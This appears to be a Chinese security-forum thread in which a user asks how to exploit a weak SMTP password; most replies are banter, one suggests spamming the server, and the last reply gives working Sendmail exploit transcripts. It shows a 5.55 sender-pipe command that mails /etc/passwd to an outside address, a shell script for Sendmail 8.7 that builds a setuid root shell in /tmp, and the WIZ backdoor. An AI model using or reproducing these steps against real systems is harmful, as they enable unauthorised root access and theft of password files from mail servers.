|
 | 作者: kubingkkk [kubingkkk]
 论坛用户 |
登录 |
| 我有得到了smtp弱口令怎么利用啊/ |
| 地主 发表时间: 01/18 01:27 |
 | 回复: vishx [vishx]  论坛用户 |
登录 |
|
XSCAN扫描 |
| B1层 发表时间: 01/18 07:49 |
 | 回复: junjuntop [junjuntop] 论坛用户 |
登录 |
|
你不费话吗 他不扫怎么知道有呢 知道有了你还要让他扫什么? 我晕!~~~~~~~~~~~~ |
| B2层 发表时间: 01/18 09:34 |
 | 回复: alixlinn [alixlinn]  论坛用户 |
登录 |
|
不知道,没用过,想知道,没人教 |
| B3层 发表时间: 01/18 12:11 |
 | 回复: playopy [playopy]  论坛用户 |
登录 |
|
有用吗?没试过啊 |
| B4层 发表时间: 01/18 12:31 |
| 回复: junjuntop [junjuntop] 论坛用户 |
登录 |
|
20cn的人都教你 |
| B5层 发表时间: 01/18 15:47 |
| 回复: hebin [hebin] 论坛用户 |
登录 |
|
晕~~~ |
| B6层 发表时间: 01/18 17:32 |
 | 回复: yaochi [yaochi]  论坛用户 |
登录 |
|
以前问不象,他好像说是发垃圾邮件的吧,没什么用 |
| B7层 发表时间: 01/18 18:33 |
| 回复: junjuntop [junjuntop] 论坛用户 |
登录 |
|
我晕 |
| B8层 发表时间: 01/18 18:35 |
| 回复: alixlinn [alixlinn] 论坛用户 |
登录 |
|
哦,那也好啊,发垃圾邮件撑死他啊 |
| B9层 发表时间: 01/18 21:30 |
 | 回复: bking [bking]  版主 |
登录 |
|
我日哦!没一个说在正题上! |
| B10层 发表时间: 01/18 21:41 |
| 回复: vishx [vishx] 论坛用户 |
登录 |
|
.smtp 先看看sendmail的几个老漏洞,前提是你要有一个合法用户: sendmail 5.55拿passwd,跟上面的差不多: # telnet www.target.com 25 Trying 127.0.0.1... Connected to www.target.com Escape character is '^]'. 220 www.target.com Sendmail 5.55 ready at Saturday, 12 Oct 00 12:34 mail from: "|/bin/mail admin@root.com.cn < /etc/passwd" 250 "|/bin/mail admin@root.com.cn < /etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself .. 250 Mail accepted quit Connection closed by foreign host. 再看看8.7上的洞洞: # telnet www.target.com 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 www.target.com ESMTP Sendmail 8.7.5/8.7.3; Saturday, 12 Oct 00 12:34 quit 221 localhost closing connection Connection closed by foreign host. # telnet www.target.com hackerworld(SunOS) login: nice Password: Last login: Sun May 10 6:15:23 from *.*.*.* You have new mail. $ cat >send.sh ----------------------------send.sh begin------------------------------------- #/bin/sh echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '}'>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '}'>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n" |head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd echo "Now type: /tmp/sh" -------------------------------send.sh end------------------------------------ $ chmod 755 send.sh $ ./send.sh Now type: /tmp/sh $ /tmp/sh # whoami root 还有WIZ后门: # telnet www.target.com 25 Trying 127.0.0.1... Connected to www.target.com Escape character is '^]'. 220 www.target.com Sendmail 5.55 ready at Saturday, 12 Oct 00 12:34 wiz Sh*ll $ |
| B11层 发表时间: 01/19 07:57 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 我有得到了smtp弱口令怎么利用啊/